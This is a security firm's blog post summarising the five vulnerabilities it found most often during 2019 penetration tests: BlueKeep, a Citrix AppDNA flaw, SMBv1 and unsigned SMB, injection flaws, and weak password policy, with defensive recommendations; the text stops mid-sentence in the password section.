TOP 5 vulnerabilities detected during our Penetration testing in 2019

The goal of this report is to take a look at vulnerabilities most often encountered during the past year, and to define a trend for the year 2020.

It is therefore based on our feedback, thus providing an overview of the 5 vulnerabilities most often encountered on the infrastructure or applications of our customers.

Of course, many critical vulnerabilities are not mentioned in this report, because they are still little encountered, affecting basic components that are well secured, or not very deployed at our customers (AWS, AZURE, Salesforce, OpenStack,), but giving interesting perspectives for the coming year.

Hope this information sharing can be useful to you.

Table of Contents

Vulnerability # 1: BlueKeep: (CVE-2019-0708).

 

This vulnerability, made public in May 2019, still affects several thousand machines today. This impacts the RDP (Remote Desktop Protocol) service on older versions of Windows but which are still used today in many companies (Win7, WinSer2008 and R2, WinSer2008, Windows2003…). This vulnerability has a score (CVSS) of 10, which makes it extremely critical, since many administrators connect via RDP to corporate infrastructures, on deprecated versions. In addition, an associated exploit exists in the Metasploit framework, making its exploitation trivial. The application of the patches provided by Microsoft is not systematic, either by ignorance of the vulnerability and of the versions deployed on the infrastructures.

 

Vulnerability # 2: Citrix, a privilege issue.

 

This vulnerability impacting Citrix AppDNA up to a certain version allows the realization of an attack of type RCE (remote code execution), leading to the possibility of realization of an elevation of privilege. Citrix portals are used by many companies to access various resources often exposed on the Web (Virtual Apps – Desktops). This vulnerability allowing access to applications in the context of migration and deployment projects, for example, the elevation of privilege on production systems would have serious consequences. In addition to integrating security into projects, active monitoring coupled with regular audits (more than once a year) on critical assets may prove to be an effective response.

 

Vulnerability # 3: SMB, over and over again.

In many companies, bad practices are still observed, such as the use of a deprecated version and therefore vulnerable to numerous attacks (SMBv1), or the absence of SMB signature allowing the realization of scenarios of elevation of privilege to within the information system. WannaCry can’t thank her enough.

This observation echoes a much larger problem, these are systems deployed by default on infrastructure, without any hardening process. So the default accounts, unused services remaining open, deprecated default protocols or allowing the possibility of using downgraded versions of certain services, here are as many open doors left to curious employees, revengeful or even attackers from the Web. Once again, a reality that is difficult to accept by production and security teams, these deprecated protocols are sometimes necessary for obsolete systems, but often the reason is the operation of CIOs in silos, which do not communicate efficiently, and do not include any plans to harden their networks and systems in their action plans.

 

Vulnerability # 4: Injections, XXE, XSS, SQLi, in great shape again this year.

Whether injecting XML files or characters interpreted by applications, they have been encountered many times in the past year. Secure development activities have not yet been carried out as they should be. Despite the good practice standards (OWASP), the code analysis tools, the inherent shortcomings of this activity persist. Whether it is technical (we do not know how to code), functional (DevSecOps, we will see later), or cultural (security it bothers me and wastes my time) aspects, these vulnerabilities will be encountered again during long time. The OWASP TOP10 will not change much in the years to come.

Even if CMS (content management system) like Drupal or WordPress greatly facilitate development activities, allowing them to integrate very pronounced security axes, this does not prevent these critical vulnerabilities from passing cycles again and again development and ending up in production. Whether for SMEs / mid-caps or large groups, secure development activities, whatever the project approach, the methodology, the ToolChain, the maturity remains mainly low, which will not allow in the near future see these vulnerabilities.

 

 

Vulnerability # 5: Password policy.

 

An unavoidable vulnerability, still present in the 2019 balance sheet and which still has a bright future ahead, is the weakness of password policies and other associated bad practices. Whether it’s the very low awareness of employees, abusive overrides, default accounts (including service), 

Leave a Reply

Your email address will not be published. Required fields are marked *